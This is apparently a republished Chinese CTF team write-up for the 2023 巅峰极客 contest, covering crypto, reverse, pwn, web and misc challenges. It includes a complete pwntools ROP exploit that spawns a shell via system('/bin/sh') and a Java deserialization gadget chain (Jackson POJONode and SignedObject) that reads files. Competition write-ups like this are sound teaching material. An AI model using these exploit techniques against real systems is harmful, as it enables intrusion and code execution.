HEADER
团队简介:
山海关安全团队(www.shg-sec.com)是一支专注网络安全的实战型团队,队员均来自国内外各大高校与企事业单位,主要从事漏洞挖掘、情报分析、反涉网犯罪研究。Arr3stY0u(意喻”逮捕你“)战队与W4ntY0u(意喻”通缉你“)预备队隶属于CTF组,我们积极参与国内外各大网络安全竞赛的同时并依托高超的逆向分析与情报分析、渗透测试技术为群众网络安全保驾护航尽一份力,简单粗暴,向涉网犯罪开炮。
题目附件下载地址
链接: https://pan.baidu.com/s/1Whp3bQ7HF9U-pG0qRvY_pA
提取码: gvwh
CRYPTO
数学但高中:
在(https://www.desmos.com/calculator?lang=zh-CN)中输入函数即可。
Simple_Encryption:
两部分,第一部分费马小定理,gcd(g1-1,N)求出 p,c1%p 就出来了,
第二部分,根据位数判断,直接开 5 次根号,然后 z3 求解。
import osfrom Crypto.Util.Padding import padfrom Crypto.Util.number import *from Crypto.Cipher import AESfrom gmpy2 import *c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134p=gcd(g1-1,N)print(gcd(g1-1,N))q=N//pc1=c1%pc2=c2%qprint(long_to_bytes(c1))print(c1.bit_length())#b'flag{f561fafb-32ce-9d'S= 234626762558445335519229319778735528295print(S.bit_length())N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101e= 5Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]cnt=3A = [(i + 128) ** 2 for i in range(cnt)]B = [(i + 1024) for i in range(cnt)]C = [(i + 512) for i in range(cnt)]test=A[0]*S**2+B[0]*S+C[0]test=pow(test,5)print(test.bit_length())for i in range(cnt):print(iroot(Cs[i],5))Cs[i]=int(iroot(Cs[i],5)[0])print(Cs)from z3 import *m1=BitVec('m1',128)m2=BitVec('m2',128)m3=BitVec('m3',128)s=Solver()s.add(m1+m2+m3==S)s.add(((A[0] * m1 *m1 + B[0] * m1 + C[0]))==Cs[0])s.add(((A[1] * m2 *m2 + B[1] * m2 + C[1]))==Cs[1])s.add(((A[2] * m3 *m3 + B[2] * m3 + C[2]))==Cs[2])print(s.check())print(s.model())'''m3 = 36029897673981719660827899610422516507,m1 = 65413472431888815878902893901773169457,m2 = 133183392452574799979498526266539842331'''m3 = 36029897673981719660827899610422516507m1 = 65413472431888815878902893901773169457m2 = 133183392452574799979498526266539842331print(long_to_bytes(m1))print(long_to_bytes(m2))print(long_to_bytes(m3))#b'16-18fa-ec795fc1'#b'd208}#flag{f561fafb-32ce-9d16-18fa-ec795fc1d208}exit()
REVERSE
m1_read:
加密是白盒 AES,用 dfa 恢复秘钥,结果秘钥全是 0 白忙活?????
./aes_keyschedule B4EF5BCB3E92E21123E951CF6F8F188E 10K00: 00000000000000000000000000000000K01: 62636363626363636263636362636363K02: 9B9898C9F9FBFBAA9B9898C9F9FBFBAAK03: 90973450696CCFFAF2F457330B0FAC99K04: EE06DA7B876A1581759E42B27E91EE2BK05: 7F2E2B88F8443E098DDA7CBBF34B9290K06: EC614B851425758C99FF09376AB49BA7K07: 217517873550620BACAF6B3CC61BF09BK08: 0EF903333BA9613897060A04511DFA9FK09: B1D4D8E28A7DB9DA1D7BB3DE4C664941K10: B4EF5BCB3E92E21123E951CF6F8F188E
秘钥恢复出来了, 直接扔到 cyberchef 解:
g0Re-U:
修改 UPX 特征码脱壳,AES-ECB+变表 Base64+Xor
from Crypto.Cipher import AESimport base64enc =[0xe6,0xce,0x89,0xc8,0xcf,0xc5,0xf5,0xc9,0xd2,0xd9,0xc0,0x91,0xce,0x7f,0xakey = "wvgitbygwbk2b46d"for i in range(len(enc)):enc[i] = (enc[i] - ord(key[i % 16])) ^ 0x1Aenc = bytes(enc).decode()new ="456789}#IJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123ABCDEFGH"raw ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"aes_enc = base64.b64decode(enc.translate(str.maketrans(new, raw)))aes = AES.new(key=b"wvgitbygwbk2b46d", mode=AES.MODE_ECB)print(aes.decrypt(aes_enc))#b'flag{g0_1s_th3_b3st_1anguage_1n_the_wOrld!_xxx}x01'
PWN
linkmap:
程序很简单,就是一个栈溢出。不过没有 puts 等泄露地址的函数。
Check 一下:
发现开启了 full relro,没办法使用 dlresolve 了。
在 ida 中看了看其他有没有好用的 gadget 或者函数什么的,果然发现了
在这个函数中,刚开始把 601040 处+a1 的值给了 v4,然后又存回了 601040,那么如果我们将 a1 赋值为 0,那不就相当于一次地址里取值操作,那也就是说,如果我们把 read 的 got 放到这个位置,执行这个函数,就会成功将 read 的 libc地址写到 601040,测试出远程是 2.35。由于 read 和 write 的 libc 地址相距只差后两个字节,所以我们可以采取爆破手段,改 read 为 write(这里其实改的是 601040,并非 got),然后再迁移回来执行这个 write 去泄露 read_got 表来获得 libc,然后调用 system 即可。主要用到 ret2csu 和栈迁移。
from pwn import*context.log_level='debug'context.arch='amd64's = lambda data : p.send(data)sl = lambda data : p.sendline(data)sa = lambda text, data : p.sendafter(text, data)sla = lambda text, data : p.sendlineafter(text, data)r = lambda : p.recv()rn = lambda x : p.recvn(x)ru = lambda text : p.recvuntil(text)dbg = lambda text=None : gdb.attach(p, text)uu32 = lambda : u32(p.recvuntil(b"xf7")[-4:].ljust(4, b'x00'))uu64 = lambda : u64(p.recvuntil(b"x7f")[-6:].ljust(8, b"x00"))lg = lambda s : log.info('�33[1;31;40m %s --> 0x%x �33[0m' % (s, eval(s)))pr = lambda s : print('�33[1;31;40m %s --> 0x%x �33[0m' % (s, eval(s)))def mydbg():gdb.attach(p,"decompiler connect ida --host 192.168.1.102 --port 3662 ")pause()pop_rdi=0x00000000004007e3pop_rsi=0x00000000004007e1bss_0601040=0x0601040pop_rsp=0x00000000004007ddread_plt=0x4004E0read_got=0x600FD8pop6_addr=0x4007DAmov_addr=0x04007C0bss_addr=0x601200ret=0x00000000004004c9i=0while True:try:lg("i")i=i+1# p=remote("pwn-1f975f76e2.challenge.xctf.org.cn", 9999, ssl=True)p=process('./ezzzz')elf=ELF('./ezzzz')libc=elf.libcpayload=b'a'*0x18+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss_0601040)+p64(0)+p64(read_plt)+p64(pop_rdi)+p64(0)+p64(0x400606)payload+=p64(pop6_addr)+p64(0)+p64(1)+p64(read_got)+p64(0x300)+p64(bss_addr)+p64(0)+p64(mov_addr)+p64(0)*7payload+=p64(pop_rsp)+p64(bss_addr)mydbg()sl(payload)pause()sl(p64(read_got))payload=p64(0)*3+p64(pop6_addr)+p64(0)+p64(1)+p64(read_got)+p64(8)+p64(bss_0601040-6)+p64(0)+p64(mov_addr)+p64(0)*7payload+=p64(pop6_addr)+p64(0)+p64(1)+p64(bss_0601040)+p64(0x8)+p64(read_got)+p64(1)+p64(mov_addr)+p64(0)*7payload+=p64(pop6_addr)+p64(0)+p64(1)+p64(read_got)+p64(0x100)+p64(bss_addr+0xa00)+p64(0)+p64(mov_addr)+p64(0)*7payload+=p64(pop_rsp)+p64(bss_addr+0xa00)pause()sl(payload)pause()s("x00x00x00x00x00x00x20x4a")libc_base=uu64()-libc.sym['read']system=libc_base+libc.sym['system']binsh=libc_base+next(libc.search(b"/bin/sh"))lg("libc_base")payload=p64(0)*3+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)pause()sl(payload)p.interactive()except EOFError:p.close()
WEB
babyurl:
审计代码得出一个思路,就是在反序列化的时候会将得到的内容写入到/tmp/file 下,然后在/file 下就可以读取到内容。
题目把这个有反序列化入口的类给 ban 了,这里的话就可以容易想到二次反序列化绕过。刚好就可以想到 SignedObject 这个 jdk 自带的类,查看依赖发现没有什么特别的类可以用 于是就想到之前阿里云 ctf 里用过的 JackSon 这个类刚好可以触发 getter。于是得出利用了链:
BadAttributeValueExpExceptionPOJONodeSignedObject
package com.yancao.ctf;import com.fasterxml.jackson.databind.node.POJONode;import com.yancao.ctf.bean.URLHelper;import com.yancao.ctf.bean.URLVisiter;import com.yancao.ctf.util.MyObjectInputStream;import javax.management.BadAttributeValueExpException;import java.io.*;import java.lang.reflect.Field;import java.net.MalformedURLException;import java.net.URL;import java.security.*;import java.util.Base64;public class test {public static void main(String[] args) throws Exception {URLHelper handler = newURLHelper("File:///F14gIsHereY0UGOTIT");URLVisiter urlVisiter = new URLVisiter();handler.visiter = urlVisiter;KeyPairGenerator keyPairGenerator;keyPairGenerator = KeyPairGenerator.getInstance("DSA");keyPairGenerator.initialize(1024);KeyPair keyPair = keyPairGenerator.genKeyPair();PrivateKey privateKey = keyPair.getPrivate();Signature signingEngine = Signature.getInstance("DSA");SignedObject signedObject = newSignedObject(handler, privateKey, signingEngine);POJONode jsonNodes = new POJONode(signedObject);BadAttributeValueExpException exp = newBadAttributeValueExpException(null);Field val =Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");val.setAccessible(true);val.set(exp, jsonNodes);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream objectOutputStream = newObjectOutputStream(barr);objectOutputStream.writeObject(exp);System.out.println(Base64.getEncoder().encodeToString(barr.toByteArra y()));ByteArrayInputStream byteArrayInputStream = newByteArrayInputStream(barr.toByteArray());ObjectInputStream ois = newMyObjectInputStream(byteArrayInputStream);URLHelper o = (URLHelper) ois.readObject();//}}
MISC
welcome:
base64
Foundme:
1.根据题目描述存在含有 flag 的图片
2. 发现使用 vol 取证工具没有效果,于是使用 binwalk 将文件内容进行分离,逐个文件分析
找到hint
判断图片类型为avif
3.搜索文件内 avif 的文件头,并将其手动分离
4. 得到flag图片
Song:
拿到附件 直接到 010 里查看一下。
发现有很多的 png 文件,那就到 kali 里 binwalk 出来。
提示 flag 在音乐里,有一个 jpg 文件
有个压缩包 提取出来。
有一个密码提示
放cyberchef里base家族:
猜测是 deepsound,直接把 song 改后缀 song.ape,提示需要密码。
弱口令123456
ook
解压压缩包:
原文始发于微信公众号(Arr3stY0u):2023 巅峰极客 writeup by Arr3stY0u
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论